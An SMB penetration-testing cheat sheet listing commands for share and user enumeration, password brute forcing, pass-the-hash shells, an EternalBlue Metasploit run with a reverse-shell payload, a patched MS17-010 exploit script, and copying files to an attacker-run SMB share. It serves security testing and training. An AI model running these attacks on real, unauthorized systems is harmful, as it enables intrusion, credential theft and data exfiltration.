SMB (Server Message Block) Pentesting

Enumeration

To enumerate automatically, you can use nmap.

nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>

# Find shared folders
# -N: No password
# -L: List shared directories
smbclient -N -L <target-ip>

# Find shared folders and files
# -M: Module
crackmapexec smb <target-ip> -u username -p password -M spider_plus
cat /tmp/cme_spider_plus/<target-ip>.json

# Enumerate users and groups
impacket-lookupsid example.local/username@10.0.0.1 -no-pass
impacket-lookupsid example.local/username@10.0.0.1 -hashes <lmhash>:<nthash>
impacket-lookupsid example.local/username@10.0.0.1
impacket-lookupsid example.local/guest@10.0.0.1
CopyCopied!

If we got “STATUS_PASSWORD_MUST_CHANGE” for some users, we can update a current password to a new one.

smbpasswd -r <target-ip> -U <username>
# or
impacket-smbpasswd <DOMAIN>/<username>:<password>@<target-ip> -newpass <new-password>
# If you don't have impacket-smbpasswd, download it from a repository.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/smbpasswd.py
CopyCopied!

Enum4linux

Enum4linux enumerates the users, share directories, etc.

# Basic
enum4linux <target-ip>
# All enumeration
enum4linux -a <target-ip>
# Verbose
enum4linux -v <target-ip>
# Specify username and password
enum4linux -u username -p password <target-ip>
CopyCopied!

Smbmap

Smbmap allows users to enumerate samba share drives across an entire domain.

smbmap -H <target-ip>
# Recursive
smbmap -H <target-ip> -R
# Username and password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
CopyCopied!

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb

# Brute force using a list of password hashes
crackmapexec smb <target-ip> -u <username> -H hashes.txt
CopyCopied!

If we find credentials, we can use the credentials for smbclient or WinRM.

Connect

You can use smbclient to connect the target.

# -L: List of shares available on a host
# -N: No password
# -U: Username
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username

# anonymous
smbclient //10.0.0.1/somedir -N
# with space
smbclient "//10.0.0.1/some dir" -N

# Specify shared directory
smbclient //10.0.0.1/somedir -U username
# nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody

# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
CopyCopied!

To get a Windows shell, run the following examples.

impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1
CopyCopied!

Commands in SMB

After connecting, you can find the sensitive files or information.

# List files
smb> ls

# Download a file
smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"
CopyCopied!

To download files recursively, run the following commands.

smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *
CopyCopied!

Or using smbget from local machine.
Especially, it’s useful for downloading a large file rather than “get” command in smbclient.

smbget smb://<target-ip>/somedir/example.txt -U username
smbget -R smb://<target-ip>/somedir -U username

# Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous

CopyCopied!

EternalBlue (MS17-010)

msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp
CopyCopied!

AutoBlue

AutoBlue is an automatic exploit.
Download the repository and run the following example command.

python zzz_exploit.py -target-ip <target-ip> -port 445 'username:password@target'
CopyCopied!

Manual Exploiting

You need to have two files - exploit.py, mysmb.py

1. Download mysmb.py

   wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py -O mysmb.py 
   
   # Convert DOS to UNIX
   dos2unix mysmb.py
   CopyCopied!

2. Edit Some Lines of mysmb.py for Python3

   You need to edit some code because this exploit is old so only supports Python2.

   Line.69
   # transData = b''
   transData = ''
   
   Line.73
   # transData = ('\x00' * padLen) + str(parameters)
   transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters)
   
   Line.80
   # transData += ('\x00' * padLen) + data
   transData += "".join(map(chr,(b'\x00' * padLen))) + str(data)
   
   Line.231
   # req = str(pkt)
   req = pkt.getData()
   return b'\x00'*2 + pack('>H', len(req)) + req  # assume length is <6553
   
   Line.381
   # data += resp['Data'][1:]
   data += resp['Data'][1:].decode()
   CopyCopied!

3. Download exploit.py

   wget -O exploit.py https://www.exploit-db.com/exploits/42315
   
   # Convert DOS to UNIX
   dos2unix exploit.py
   CopyCopied!

4. Edit the Credentials in exploit.py

   
   ...
   username = "username"
   password = "password"
   ...
   
   CopyCopied!

5. Run the script

   python exploit.py <target-ip> netlogon
   python exploit.py <target-ip> lsarpc
   python exploit.py <target-ip> samr
   CopyCopied!

Launch SMB Server

impacket-smbserver share . -smb2support -username user -password pass
CopyCopied!

Access from Remote Machine

net use \\<local-ip>\share /u:user pass
CopyCopied!

Transfer Files

# Remote to Local
cp .\example.txt \\<local-ip>\share\example.txt
CopyCopied!